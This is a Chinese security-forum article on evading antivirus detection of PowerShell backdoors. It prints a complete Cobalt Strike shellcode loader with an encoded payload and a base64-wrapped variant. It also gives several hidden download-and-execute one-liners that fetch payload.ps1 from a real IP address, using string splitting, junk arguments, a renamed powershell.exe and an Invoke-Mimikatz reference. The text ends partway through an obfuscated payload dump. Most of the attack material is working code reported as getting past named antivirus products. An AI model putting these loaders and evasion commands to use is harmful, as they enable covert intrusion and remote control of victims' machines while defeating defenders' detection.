问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
powershell免杀思路分析
# powershell免杀思路分析 ## 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者...
powershell免杀思路分析 ================ 写在前面 ---- powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服务器上,通过下载到内存中执行等方式来执行,导致其在防护这块还是存在很多技术难度,powershell后门和挖矿也越来越受人关注。在内网渗透中,免杀技术显得格外重要,在免杀的学习中,经常陷入一个误区,按照教程复现一遍,甚至不知道别人再讲什么,只知道可以免杀,而一旦别人的免杀技巧给查杀,自己对其免杀思路就束手无策,而正所谓授人以鱼不如授人以渔,接下来将使用CS生成的后门对国内主流的某绒、某60来查杀分析。 前期知识准备 ------ **Powershell执行策略** ```php powershell.exe Get-ExecutionPolicy 获取执行策略 Restricted: 脚本不能运行(默认设置) RemoteSigned: 在本地创建的脚本可以运行,网上下载的脚本无法运行(拥有数字证书签名例外) AllSigned: 仅当脚本由受信任的发布者签名时才能运行 Unrestricted: 允许所有脚本运行 Set-ExecutionPolicy <Policy name> 设置执行策略 ``` **常用powershell参数请参考:** [https://blog.csdn.net/qq\_51524329/article/details/121579801](https://blog.csdn.net/qq_51524329/article/details/121579801) **免杀方式主要考虑的问题:** 1、免杀工具执行的条件 2、文件的大小 3、是否能够正常使用(这里是能否正常上线) powershell免杀思路过程分析 ================== cs生成一个powershell后门,某绒、某60直接查杀。 ```php Set-StrictMode -Version 2 $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckudNiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMSEZqYCOxumHghCTQKyeshNUJb+HGT1K+fCnkZi8w3942ooKDteZVK8Nv3XJ+r1XoEFAaN0Oye7OOQHLJCeOrvBkIoSye36GOaNKQ8TcXI3ZQRlEOYkRGTVcZA25MWUpPT0IMFw0TAwtATE5TQldKQU9GGANucGpmAxsNExgDdEpNR0xUUANtdwMWDREYA3dRSkdGTVcMFw0TGAMNbWZ3A2BvcQMRDRMNFhMUERQKLikj8gUWCTmTwYXZDzbI8Mkt8C65GlH5y2BrfKj3h82N6j+GXO1rO4H+b+RtVK1ay9SFf7Wr6c0fTX7e2TM25l7HpxgLpMmV9VeVOrI6bbZZymxKRLzE7MtCqank3Vzm7PsSIsKtZpboC4RYhAELYugCImha7OGcV7tQKo9wpaZ3OJP8LP3+alfk7+M58eyX43AyjJgckls0FRua/qFFZL2uV3H96CJesokr+qK3UCdLNlJsisRGx/Mc6VESE6IK++2z3+JtcCaw5Pdcg6iLuCNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcFxQNEhIQDRESFA0SERsjMRd1Ww==') for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor 35 } $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))) $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length) $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void]))) $var_runme.Invoke([IntPtr]::Zero) '@ #shellcode代码 If ([IntPtr]::size -eq 8) { start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job } else { IEX $DoIt } #执行shellcode ``` ### 本地执行代码-编码分析 本地执行代码的含义就是将powershell脚本直接上传至目标服务器来进行执行,现在我们首先要做的是什么呢?当然是先定位特征码。何为特征码,特征码就是病毒特有的特征,一般杀软件检测是根据特征码来检测,特征码检测指一种精确地检索一组匹配字符串的直接模式,每个病毒及其 变种的特征都包含在扫描器的定义库中,而这些特征是不会出现在未被感 染的文件中的。 在powershell脚本如何手动定位特征码呢?直接一段一段代码删除,每次都使用杀毒软件查杀,就可以定位特征码(exe程序定位特征码)在该powershell脚本中杀毒软件主要对DoIt变量的内容进行查杀。这里特别要注意base64编码的选择器,有些网上的在线编码器编码后并不能执行。 ```php Set-StrictMode -Version 2 $DoIt = @' ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t1ZE5pTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNVTA4VmFTUFgzazFKZGtKU0Ftb3JINGs4UDhxcU0vVWltd1RMSjBUMlRZK1FtcFVhVGU0VDZMTDdQRlU5Y0REaVlGcytxZmp6UjFRSnd6ZHMvUEFLb2xnaXozNnZHNDE0dXZ2MzMzcXJJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRncwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4c05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSUtMaWtqTnVUZzJYODdKemVQeS80VWl5Z1ZCWUFKUnNRcXF6ekQyZnNZOHgvODB0bnB4TXpXK0FHcUxhNkEyV1FzandLSXhXeGt6dkNhcGZ4cEgxRXJiTmczdmNCQ2RNVkV2TTRZNXRoYk92aysrMUlqZGpVSEh4ZUVDUC9QRUlYU2xNcCttaVc1UWhoNm4xTFF3Vmt0eDZMaDczM0wxMWx4aVhyWmZ1RXNucnU3amozdGFtcEdoSlNTb0taZEVqYVdhM1gzQ0xtRmhmUndjcVVRSllEeENWWnJydVBMNGtoakI2cTdubmgxb3JZWEs1SUJWVWpnQXdWMlY1ZHFPdzNadEJaUXIrZzJmODB1TzcrSm5waytzME1JOWVncDN0QjUzZk83UU5kdEluclc5VFo4V0lnU01IaE9JSnVkaEphM0lpTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNGeFFORWhJUURSRVNGQTBTRVJzak1SZDFXdz09JykKCmZvciAoJHggPSAwOyAkeCAtbHQgJHZhcl9jb2RlLkNvdW50OyAkeCsrKSB7CgkkdmFyX2NvZGVbJHhdID0gJHZhcl9jb2RlWyR4XSAtYnhvciAzNQp9CgokdmFyX3ZhID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoKGZ1bmNfZ2V0X3Byb2NfYWRkcmVzcyBrZXJuZWwzMi5kbGwgVmlydHVhbEFsbG9jKSwgKGZ1bmNfZ2V0X2RlbGVnYXRlX3R5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtVSW50MzJdLCBbVUludDMyXSkgKFtJbnRQdHJdKSkpCiR2YXJfYnVmZmVyID0gJHZhcl92YS5JbnZva2UoW0ludFB0cl06Olplcm8sICR2YXJfY29kZS5MZW5ndGgsIDB4MzAwMCwgMHg0MCkKW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6Q29weSgkdmFyX2NvZGUsIDAsICR2YXJfYnVmZmVyLCAkdmFyX2NvZGUubGVuZ3RoKQoKJHZhcl9ydW5tZSA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCR2YXJfYnVmZmVyLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdKSAoW1ZvaWRdKSkpCiR2YXJfcnVubWUuSW52b2tlKFtJbnRQdHJdOjpaZXJvKQ== '@ #经过base64编码 $mksec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))#对$DoIt进行base64解码并赋值给mksec,那么问题又来了,又会问为什么要base64解码,那是因为如果base64的变量直接传递给下面执行的语句会被执行吗?显然是不会的,所以要进行base64解码。下面的$DoIt变量就要改成$mksec If ([IntPtr]::size -eq 8) { start-job { param($a) IEX $a } -RunAs32 -Argument $mksec | wait-job | Receive-Job } else { IEX $mksec } ``` 将上述powershell脚本拿去查杀,发现某绒查杀,某60不查杀且成功上线,就不截图了,因为下面还有很多尝试如果每次进行查杀实验都要截图的话看过去很反感。那这说明了什么?说明某绒对静态代码查杀能力强,某60对静态代码查杀能力弱。 #### 远程下载执行--替换&拆分&干扰 远程下载执行含义: [![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-4a328dc322b753f57d066188778390be3d1b3480.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-4a328dc322b753f57d066188778390be3d1b3480.png) **远程执行** 将上述的powershell后门脚本放置我们的服务器,在目标服务器执行以下命令 ```php powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.113.217.128/payload.ps1'))"//下载powershell脚本并隐藏执行 ``` 某绒直接查杀,某60也直接查杀 **替换文件名** 这个又是干嘛呢?其实就是将powershell.exe中的内容复制到文本中,此时的文本就相当于是powershell.exe。 ```php copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt bypass.txt -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.113.217.128//payload.ps1'))" ``` 此时过某绒且成功上线,某60查杀。 **拆分http** 以变量的方式拆分http,然后再进行拼接进行下载并执行 ```php powershell -nop -w hidden -c "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.113.217.128//payload.ps1''));Invoke-Mimikatz';IEX ($a+$b)" ``` 此时过某绒且成功上线,某60查杀。 **两种方式结合** 如果将上述两种方法相结合又会产生什么样的效果呢? ```php bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.113.217.128/payload.ps1''));Invoke-Mimikatz';IEX ($a+$b)" ``` 此时过某绒且成功上线,某60查杀。 **添加垃圾字符** ```php powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://47.113.217.128/payload.ps1') ``` 此时过某绒且成功上线,某60查杀。 如果我将上面三种方法全部结合又会出现什么样的结果呢?免杀思路就是不断尝试,不断的去思考。 ```php bypass.txt -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://47.113.217.128/payload.ps1') ``` 此时过某绒且成功上线,某60查杀。 通过上面的分析应该有点清楚免杀的思路了吧,对于上面的测试我们只是将未编码的powershell后门脚本放置我们的服务器,然后下载并执行,如果我将编码过后的放置到服务器又会擦出什么样的火花呢?这里我也尝试过了,结果与上面的一致,通过这个现象我们能够发现什么问题呢?说明在远程下载执行的时候,杀毒软件查杀的并不是我们服务器上的代码,而是检测powershell进程。为什么这么说,因为我们放置服务器的代码并不能绕过某绒。在同时也可以发现某绒对进程的检测能力一般,而某60对进程的查杀能力很强。别急,下面我们继续尝试其他方法。 远程下载&&混淆编码 ------------------ 对于第一开始的base64编码混淆,我们的方式还是太简单,那么有没有一款工具能够对powershell很好的进行编码混淆呢?完成一个复杂的编码混淆呢?这里介绍一款专门用于powershell脚本进行编码混淆的工具。 Invoke-Obfuscation 下载地址:<https://github.com/danielbohannon/Invoke-Obfuscation> **基本使用命令:** ```php 安装使用: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 处理文件:set scriptpath C:\Users\86135\Desktop\1.ps1 处理代码:set scriptblock 'xxxx' 进入编码:encoding 选择编码:1-8 有8中编码方式 输出文件:out C:\Users\acer\Desktop\11.ps1 ``` 连工具都杀,为什么连工具都杀呢?先继续看下面,后面我会一一道来。 [![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-a52d660aa5dcc84230e58e51a5ccbdfa757feb22.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-a52d660aa5dcc84230e58e51a5ccbdfa757feb22.png) 对其源码进行编码 [![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-5efe30b4e70f7f7772031614feb00230ea85f3bf.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-5efe30b4e70f7f7772031614feb00230ea85f3bf.png) 这里随便选一个进行编码,来看一下编码后的内容吧!可以看到经过混淆的代码非常复杂,我们一般是非常难混淆出这么复杂的代码的。 ```php &( $PShoMe[4]+$psHOmE[34]+'x') (((83, 101 ,116,45, 83,116,114,105,99,116, 77 , 111, 100 , 101 , 32 ,45 ,86, 101, 114 , 115 , 105 ,111,110 , 32,50 , 10,10, 36 ,68, 111 ,73,116, 32 , 61 ,32, 64 , 39 , 10,90,110 ,86 , 117 ,89 , 51, 82, 112 , 98, 50,52 , 103 ,90,110,86,117,89,49,57 , 110 , 90 , 88 ,82,102, 99 , 72 , 74 , 118,89, 49,57 ,104 , 90, 71, 82, 121,90, 88 ,78 ,122 ,73,72 ,115,75, 67, 86 , 66 ,104 , 99,109,70,116 , 73 ,67 ,103 , 107, 100 , 109 , 70 ,121 ,88 ,50,49, 118 , 90 ,72 ,86 , 115 , 90 ,83,119,103,74,72,90,104 , 99 , 108 , 57 ,119, 99,109,57 , 106, 90,87, 82 , 49 ,99,109,85, 112 ,67 ,81 ,107,75 ,67 ,83,82, 50 ,89 , 88, 74, 102 ,100, 87 ,53,122,89 ,87, 90 ,108, 88, 50, 53,104 , 100, 71 ,108 , 50, 90 ,86 , 57 , 116,90 ,88, 82, 111 , 98,50 ,82,122 ,73 ,68 , 48 , 103, 75 ,70,116, 66, 99 , 72 , 66,69, 98,50 ,49 , 104,97,87 ,53 , 100 ,79,106 ,112, 68 , 100 ,88 ,74 ,121, 90 , 87 ,53 , 48 ,82,71, 57, 116, 89,87,108 ,117 , 76,107,100 , 108,100 , 69 , 70, 122 ,99 ,50, 86, 116,89 ,109 , 120,112 ,90 , 88,77 ,111,75 , 83,66 ,56 ,73, 70 , 100 ,111, 90 ,88,74,108 ,76, 85 , 57, 105 ,97 ,109 ,86 ,106, 100,67 ,66 , 55,73,67 ,82, 102, 76 , 107,100,115 ,98,50 ,74 ,104 ,98,69, 70, 122 , 99,50 ,86 ,116, 89 ,109,120 , 53 ,81 ,50, 70 ,106,97, 71, 85, 103 , 76, 85, 70 , 117 ,90, 67 , 65, 107,88, 121, 53 , 77 ,98, 50 , 78, 104,100,71,108, 118,98,105,53 ,84,99,71,120,112 ,100,67,103,110,88,70, 119 , 110 ,75, 86 ,115 ,116, 77, 86 , 48 ,117 ,82,88,70,49 ,89,87 ,120,122 ,75 ,67 ,100 , 84,101 , 88 , 78,48,90 , 87, 48 , 117, 90 ,71 ,120, 115 ,74,121, 107, 103 ,102 , 83, 107 , 117 , 82 ,50, 86 ,48 ,86 ,72 , 108 , 119 ,90 , 83,103,110 ,84 , 87 ,108 ,106,99,109, 57 ,122 , 98,50, 90 , 48,76, 108 , 100,112, 98 ,106 ,77,121 , 76, 108, 86 ,117, 99, 50 ,70 ,109 ,90 ,85,53,104 , 100 , 71 , 108,50 , 90,85 ,49,108 ,100 , 71,104,118 , 90,72,77, 110, 75,81 ,111,74, 74,72, 90,104 , 99 , 108, 57 , 110, 99,71 , 69 , 103 , 80, 83,65 ,107,100 ,109 ,70 , 121, 88 ,51, 86 , 117 , 99 , 50, 70 , 109,90,86,57, 117,89 ,88 ,82 , 112 ,100 ,109,86, 102, 98 , 87,86 , 48,97, 71 , 57,107 , 99,121 ,53, 72 ,90 , 88 ,82,78,90 , 88 , 82,111, 98 ,50 ,81, 111, 74 ,48, 100 , 108 , 100 , 70,66,121 , 98 , 50 ,78,66 ,90, 71 , 82 , 121, 90 , 88, 78 ,122,74, 121 ,119 , 103 , 87 , 49 , 82 ,53 ,99 , 71 ,86,98, 88 ,86 , 48 , 103 ,81 , 67 , 103 ,110, 85,51, 108 ,122,100 , 71,86,116, 76,108 ,74 , 49, 98, 110 , 82, 112,98 , 87, 85, 117 , 83 , 87,53, 48, 90,88 ,74,118, 99 ,70 , 78 ,108 , 99 , 110 , 90,112 , 89,50, 86, 122 ,76, 107, 104 ,104 , 98 ,109 ,82,115, 90,86, 74 , 108 , 90, 105 ,99 ,115,73, 67 , 100,122 ,100 , 72 ,74 ,112 , 98, 109,99 , 110 , 75, 83,107, 75, 67,88,74,108 ,100,72,86 , 121,98 ,105 , 65,107,100, 109,70 ,121 , 88 ,50 ,100 ,119 , 89 ,83 , 53 ,74 ,98, 110 ,90 ,118, 97 , 50 ,85 , 111, 74 , 71 , 53 ,49, 98 ,71 ,119 , 115, 73, 69, 65, 111 , 87,49 ,78 ,53 , 99 , 51, 82, 108,98 , 83 ,53, 83,100 ,87 , 53 , 48,97 , 87 , 49 , 108,76 ,107 , 108 ,117,100,71 ,86 , 121, 98,51, 66 , 84, 90 , 88, 74 ,50 ,97 , 87 ,78, 108 , 99, 121,53 ,73,89 ,87 , 53 ,107, 98, 71 , 86, 83, 90 ,87, 90 , 100, 75 , 69,53 ,108,100 ,121,49,80, 89,109 , 112 , 108 , 89, 51 ,81,103 ,85 ,51, 108 , 122 ,100,71,86 , 116, 76 , 108, 74 ,49 , 98, 110, 82 ,112 , 98, 87, 85,117, 83 ,87 , 53,48,90, 88 ,74, 118,99 , 70 ,78 , 108,99 ,110,90 , 112 ,89 , 50, 86,122 , 76, 107, 104 ,104 ,98 , 109 ,82 , 115,90,86, 74 , 108 , 90, 105, 103, 111,84 ,109, 86, 51 , 76 ,85, 57 ,105, 97, 109,86, 106,100 , 67,66 ,74,98,110,82,81, 100 , 72,73 ,112, 76 , 67, 65 , 111 ,74, 72, 90 ,104, 99 , 108 ,57,49,98, 110 , 78 ,104, 90 , 109 , 86 , 102 ,98 , 109 , 70 ,48,97, 88,90 , 108 , 88,50, 49,108 ,100, 71,104,118 , 90, 72 , 77 ,117, 82, 50 , 86 ,48,84 , 87, 86 ,48, 97,71 , 57, 107, 75,67,100 , 72 , 90, 88 ,82 , 78 , 98,50 ,82 , 49, 98 , 71,86 , 73 , 89 ,87 ,53,107 ,98 ,71, 85 ,110 , 75, 83,107, 117 , 83,87 , 53 , 50 ,98 ,50,116, 108, 75 , 67 ,82 , 117, 100 , 87,120 ,115 , 76,67 , 66,65,75 , 67, 82 ,50 ,89 ,88 ,74 , 102 , 98 , 87,57 , 107 , 100,87 , 120 , 108,75, 83,107 , 112, 75,83 ,119,103, 74 , 72 , 90 , 104, 99 ,108, 57,119 , 99 ,109,57, 106,90,87,82, 49 ,99 ,109 , 85 , 112 ,75 , 81,112 ,57 ,67 ,103,112 ,109 , 100,87 ,53,106, 100 ,71 ,108, 118 , 98,105, 66,109 , 100,87 , 53, 106,88, 50 , 100 ,108,100,70,57,107 ,90 , 87,120,108, 90,50, 70 ,48 , 90 ,86,57, 48 , 101 ,88, 66 ,108, 73 , 72 ,115,75, 67,86 ,66,104,99 , 109,70 ,116, 73, 67,103,75,67,81, 108 ,98, 85, 71,70, 121 , 89 , 87 ,49 ,108 , 100,71 ,86 , 121, 75,70,66 , 118, 99,50 , 108,48 , 97,87 , 57,117 ,73, 68 , 48 , 103, 77 , 67, 119, 103 , 84 ,87,70,117,90, 71 ,70, 48 , 98, 51 , 74 ,53,73 ,68 , 48,103 , 74 ,70 , 82, 121, 100,87, 85 ,112 , 88 , 83, 66 ,98,86 ,72, 108 , 119 ,90 , 86,116, 100 , 88 , 83 ,65, 107 , 100 ,109 , 70, 121,88,51, 66 , 104,99,109 , 70 , 116 ,90,88 ,82,108, 99, 110 ,77, 115,67, 103 ,107, 74, 87,49,66, 104,99,109,70,116 ,90, 88 , 82,108 ,99 ,105 , 104,81 , 98,51 , 78 , 112,100,71 , 108 , 118,98 , 105 ,65 ,57,73 ,68,69,112,88 ,83 , 66, 98 ,86 , 72 ,108,119 , 90, 86, 48 ,103,74, 72, 90, 104 ,99,108, 57,121 , 90 , 88 , 82 ,49,99,109,53 , 102 , 100 ,72, 108 ,119 , 90 , 83, 65,57 , 73,70,116, 87 ,98 , 50 , 108, 107 , 88 ,81 , 111 , 74 ,75, 81,111 , 75, 67,83, 82, 50, 89 , 88,74,102 , 100, 72,108,119 , 90 , 86, 57, 105 , 100 ,87, 108 ,115, 90,71 , 86 ,121 ,73, 68, 48 ,103,87, 48 , 70, 119 ,99 , 69, 82, 118 , 98 ,87 ,70 ,112, 98 , 108 , 48, 54,79 ,107 , 78, 49 , 99 ,110, 74 , 108 ,98 ,110 ,82,69 ,98 ,50,49 , 104 , 97,87, 52 , 117 , 82 , 71 ,86 , 109,97 , 87 ,53 ,108 ,82,72 ,108,117,89 ,87, 49 ,112, 89, 48 , 70 ,122, 99 , 50 ,86 ,116 , 89 , 109,120 , 53,75 , 67 ,104,79,90 , 88, 99,116 , 84, 50 ,74 , 113, 90 , 87 ,78 , 48 , 73 , 70 , 78 , 53, 99 ,51, 82 ,108 ,98 ,83,53 ,83 